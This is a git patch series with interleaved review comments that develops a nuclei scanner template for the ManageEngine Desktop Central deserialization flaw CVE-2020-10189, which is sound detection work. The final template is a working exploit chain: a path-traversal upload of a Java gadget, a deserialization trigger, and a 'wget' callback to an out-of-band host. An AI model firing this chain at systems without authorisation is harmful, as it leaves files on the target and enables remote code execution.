From 8a5bde391ba78e579a08f85a5c4344d04ff94a47 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 16 Apr 2024 14:15:38 -0500 Subject: [PATCH 1/8] Create CVE-2020-10189 template --- http/cves/2020/CVE-2020-10189.yaml | 40 ++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/cves/2020/CVE-2020-10189.yaml diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml new file mode 100644 index 0000000000..3d97618a66 --- /dev/null +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-10189 + +info: + name: ManageEngine Desktop Central Java Deserialization + author: king-alexander + severity: critical + remediation: Apply updates per vendor instructions. + description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 + - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html + - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html + tags: cve,cve2020,kev + +http: + - method: GET + path: + - "https://{{Host}}:8383/configurations.do" + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - "^([0-9.]+)?([0-9.]+)?([0-9]+)$" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ManageEngine Desktop Central" + + - type: dsl + dsl: + - compare_versions(version, '<10.0.474') From a58c0036b9cf44ebe205a65f72fb1a9e9d56ed49 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 16 Apr 2024 14:25:58 -0500 Subject: [PATCH 2/8] Fix trailing whitespace --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 3d97618a66..51eabfb486 100644 --- a/http/cves/2020/CVE-2020-10189.yaml 
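Review bot: The version extractor's pattern `"^([0-9.]+)?([0-9.]+)?([0-9]+)$"` is anchored with `^`/`$` but is applied to the whole `configurations.do` response, so it can only match a body that consists of nothing but a version string, and its three overlapping optional groups make `group: 1` ambiguous; the `compare_versions(version, '<10.0.474')` dsl matcher then evaluates against an empty variable. A pattern keyed to the markup around the version (with `(?m)` if it must be line-anchored) and a single capture group is needed for the version gate to mean anything. The path also hard-codes `https://{{Host}}:8383`, so a target supplied on another scheme or port is never scanned; `{{BaseURL}}` is the usual form. Worth confirming the extractor against a known-vulnerable build before relying on this check.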
+++ b/http/cves/2020/CVE-2020-10189.yaml @@ -4,7 +4,7 @@ info: name: ManageEngine Desktop Central Java Deserialization author: king-alexander severity: critical - remediation: Apply updates per vendor instructions. + remediation: Apply updates per vendor instructions. description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 From 4be597880b258112bac1eda90bc1b5c39fbee152 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 11:51:34 -0500 Subject: [PATCH 3/8] Add Stage 1 Stage 1 is the arbitrary file write. This code creates a new file on the Zoho ManageEngine server with our serialized exploit, which will be executed in the next stage. --- http/cves/2020/CVE-2020-10189.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 51eabfb486..6c034ee761 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -13,6 +13,7 @@ info: tags: cve,cve2020,kev http: + # detect vulnerable version - method: GET path: - "https://{{Host}}:8383/configurations.do" @@ -38,3 +39,17 @@ http: - type: dsl dsl: - compare_versions(version, '<10.0.474') + # arbitrary file write + - method: POST + headers: + Content-Type: application/octet-stream + path: + # 'udid' is entirely attacker-controlled and 'logger.zip' is an allow-listed filename + - "https://{{Host}}:8383/mdm/client/v1/mdmLogUploader?udid={{rand_int()}}&filename=logger.zip" + # generate a serialized raw bytes payload + body: '{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}' + + matchers: + - type: status + status: + - 200 From 825b9fbed4d5b80e2adc3319f702ff41fec27b99 Mon Sep 17 00:00:00 2001 
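Review bot: The stage-1 matcher at the end of the hunk is a bare `status: 200` without `internal: true`, so nuclei reports a finding whenever the upload endpoint answers 200, before any later request triggers the deserialization; marking it `internal: true` keeps the upload as a precondition rather than a result. Independently, `udid={{rand_int()}}` places the file under a random directory, so a later stage that requests it by a fixed name will not find it — the comment notes udid is attacker-controlled, which is exactly why it should carry the traversal to the directory the trigger reads from (a later revision in this series uses `si\..\..\..\webapps\DesktopCentral\_chart`). This stage also leaves a serialized gadget on the target's disk, so the template should carry the `intrusive` tag.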
From: Alexander King Date: Tue, 30 Apr 2024 13:13:14 -0500 Subject: [PATCH 4/8] Add Stage 2 Stage 2 triggers the deserialization vulnerability in `getChartImage()`. --- http/cves/2020/CVE-2020-10189.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 6c034ee761..e40388c733 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -39,6 +39,7 @@ http: - type: dsl dsl: - compare_versions(version, '<10.0.474') + # arbitrary file write - method: POST headers: @@ -53,3 +54,19 @@ http: - type: status status: - 200 + + # deserialization + - method: POST + path: + - "https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol + words: + - "http" From 7f80f000b4fda49adcca496e4e5216e0148a78d2 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Tue, 30 Apr 2024 13:19:31 -0500 Subject: [PATCH 5/8] Update description --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index e40388c733..990833f69c 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -5,7 +5,7 @@ info: author: king-alexander severity: critical remediation: Apply updates per vendor instructions. - description: This template detects the presence of a Java deserialization vulnerability within verisions below 10.0.474. + description: Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html From d3087ea35f3b961e77fca2291dafc0b3dce7fcab Mon Sep 17 00:00:00 2001 
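Review bot: The stage-2 path `"https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip"` uses single braces for `{Host}`, so it is sent literally instead of substituted, and `{{File}}` is not defined anywhere in the template; as written the request cannot reach the target. The backslash in `img=` is also sent raw and may be normalized by the client; URL-encoding it is safer, e.g. `- "{{BaseURL}}/cewolf/?img=%5Clogger.zip"`. The `interactsh_protocol` match on `http` additionally depends on `wget` being available to the deserializing process, which is unlikely if the target is a Windows install (the backslash path suggests it is); a `dns` match driven by a command present on both platforms, such as `nslookup {{interactsh-url}}`, is more robust.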
From: Alexander King Date: Tue, 30 Apr 2024 13:22:39 -0500 Subject: [PATCH 6/8] Update references I referenced Packet Storm for the logic to detect vulnerable versions and Source Incite for the proof of concept. --- http/cves/2020/CVE-2020-10189.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 990833f69c..5c7e88c67e 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml @@ -9,6 +9,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html + - https://srcincite.io/pocs/src-2020-0011.py.txt - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html tags: cve,cve2020,kev From 0d6238b97ba1b914a4040c373d4315d0daf6c6a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 24 Jun 2024 16:24:10 +0530 Subject: [PATCH 7/8] fix template --- http/cves/2020/CVE-2020-10189.yaml | 104 ++++++++++++++--------------- 1 file changed, 50 insertions(+), 54 deletions(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index 5c7e88c67e..a6332680e6 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml 
@@ -4,70 +4,66 @@ info: name: ManageEngine Desktop Central Java Deserialization author: king-alexander severity: critical - remediation: Apply updates per vendor instructions. - description: Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. + description: | + Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. + remediation: | + Apply updates per vendor instructions. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - - https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html - - https://srcincite.io/pocs/src-2020-0011.py.txt + - https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189 - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html - tags: cve,cve2020,kev + - https://y4er.com/posts/cve-2020-10189-zoho-manageengine-rce/ + - https://cwe.mitre.org/data/definitions/502.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-10189 + cwe-id: CWE-502 + epss-score: 0.97206 + epss-percentile: 0.99826 + cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zohocorp + product: manageengine_desktop_central + fofa-query: + - body="manageengine desktop central 10" + - title="manageengine desktop central 10" + - app="zoho-manageengine-desktop" + shodan-query: http.title:"manageengine desktop central 10" + google-query: intitle:"manageengine desktop central 10" + tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive + +flow: http(1) && http(2) http: - # detect vulnerable version - - method: GET - path: - - "https://{{Host}}:8383/configurations.do" + - raw: + - | + POST 
/mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream - extractors: - - type: regex - name: version + {{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}} + + matchers: + - type: status + status: + - 200 internal: true - group: 1 - regex: - - "^([0-9.]+)?([0-9.]+)?([0-9]+)$" + + - raw: + - | + POST /cewolf/?img=%5Clogger.zip HTTP/1.1 + Host: {{Hostname}} matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - words: - - "ManageEngine Desktop Central" - - - type: dsl - dsl: - - compare_versions(version, '<10.0.474') - - # arbitrary file write - - method: POST - headers: - Content-Type: application/octet-stream - path: - # 'udid' is entirely attacker-controlled and 'logger.zip' is an allow-listed filename - - "https://{{Host}}:8383/mdm/client/v1/mdmLogUploader?udid={{rand_int()}}&filename=logger.zip" - # generate a serialized raw bytes payload - body: '{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}' - - matchers: - - type: status - status: - - 200 - - # deserialization - - method: POST - path: - - "https://{Host}:8383/cewolf/{{File}}?img=\\logger.zip" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word part: interactsh_protocol words: - - "http" + - "dns" + + - type: status + status: + - 200 From c7da7e51d00064323f7420d2f9d5acddf2f91690 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 Jul 2024 13:55:16 +0530 Subject: [PATCH 8/8] update req --- http/cves/2020/CVE-2020-10189.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml index a6332680e6..39653c65ca 100644 --- a/http/cves/2020/CVE-2020-10189.yaml +++ b/http/cves/2020/CVE-2020-10189.yaml 
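Review bot: `max-request: 1` in the new metadata understates the template: `flow: http(1) && http(2)` sends two requests per target, so it should read `max-request: 2`. The payload command is still `wget http://{{interactsh-url}}` while the traversal in `udid` targets `webapps\DesktopCentral\_chart`, which suggests a Windows install where `wget` is not normally on the PATH; since the matcher now only needs a `dns` interaction, a cross-platform trigger such as `nslookup {{interactsh-url}}` would be less likely to fail silently. With the version gate removed, every scanned host receives the gadget upload and keeps `logger.zip` under `_chart` afterwards, so the `intrusive` tag added here is essential, and the `remediation` block could mention that the dropped file should be removed after a positive result.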
@@ -54,7 +54,7 @@ http: - raw: - | - POST /cewolf/?img=%5Clogger.zip HTTP/1.1 + GET /cewolf/?img=%5Clogger.zip HTTP/1.1 Host: {{Hostname}} matchers-condition: and